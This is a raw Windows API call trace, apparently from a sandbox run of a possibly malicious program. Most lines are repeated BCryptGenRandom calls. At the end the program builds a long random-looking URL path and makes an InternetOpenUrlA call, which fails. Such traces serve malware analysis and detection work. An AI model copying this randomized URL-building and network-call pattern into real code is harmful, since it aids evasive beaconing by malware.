BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4c81, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x4d4c81) returned 0x0 [0263.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0263.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.656] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.656] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.657] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.657] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.658] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.658] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.658] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.658] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.659] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.660] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.660] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.661] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.661] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.662] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.662] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.663] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.663] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0263.663] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4cae, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x4d4cae) returned 0x0 [0263.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.664] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.665] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.666] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.666] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.667] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.667] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.668] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.668] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.671] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.672] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.672] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.673] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.673] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.674] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.674] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.675] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.675] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0263.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.676] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.676] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.677] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0263.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0263.677] GetProcessHeap () returned 0x440000 [0263.677] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0263.677] lstrcpyA (in: lpString1=0x472b10, lpString2="@LM" | out: lpString1="@LM") returned="@LM" [0263.677] lstrcatA (in: lpString1="@LM", lpString2="/gg71fwreHoY8xrb7xuganudzVq3/abue7jomwIgp1umo12gFj09nbmc2pcbszmC/d8E997c25e8Ci0gjIYimmzs4va2epxx88ho4cok6uzsH/eZus9eeb0aem56BBV58Z1ssU3rv872xqwr4lf920h5bijt/" | out: lpString1="@LM/gg71fwreHoY8xrb7xuganudzVq3/abue7jomwIgp1umo12gFj09nbmc2pcbszmC/d8E997c25e8Ci0gjIYimmzs4va2epxx88ho4cok6uzsH/eZus9eeb0aem56BBV58Z1ssU3rv872xqwr4lf920h5bijt/") returned="@LM/gg71fwreHoY8xrb7xuganudzVq3/abue7jomwIgp1umo12gFj09nbmc2pcbszmC/d8E997c25e8Ci0gjIYimmzs4va2epxx88ho4cok6uzsH/eZus9eeb0aem56BBV58Z1ssU3rv872xqwr4lf920h5bijt/" [0263.677] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0263.677] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="@LM/gg71fwreHoY8xrb7xuganudzVq3/abue7jomwIgp1umo12gFj09nbmc2pcbszmC/d8E997c25e8Ci0gjIYimmzs4va2epxx88ho4cok6uzsH/eZus9eeb0aem56BBV58Z1ssU3rv872xqwr4lf920h5bijt/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0263.678] GetProcessHeap () returned 0x440000 [0263.678] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 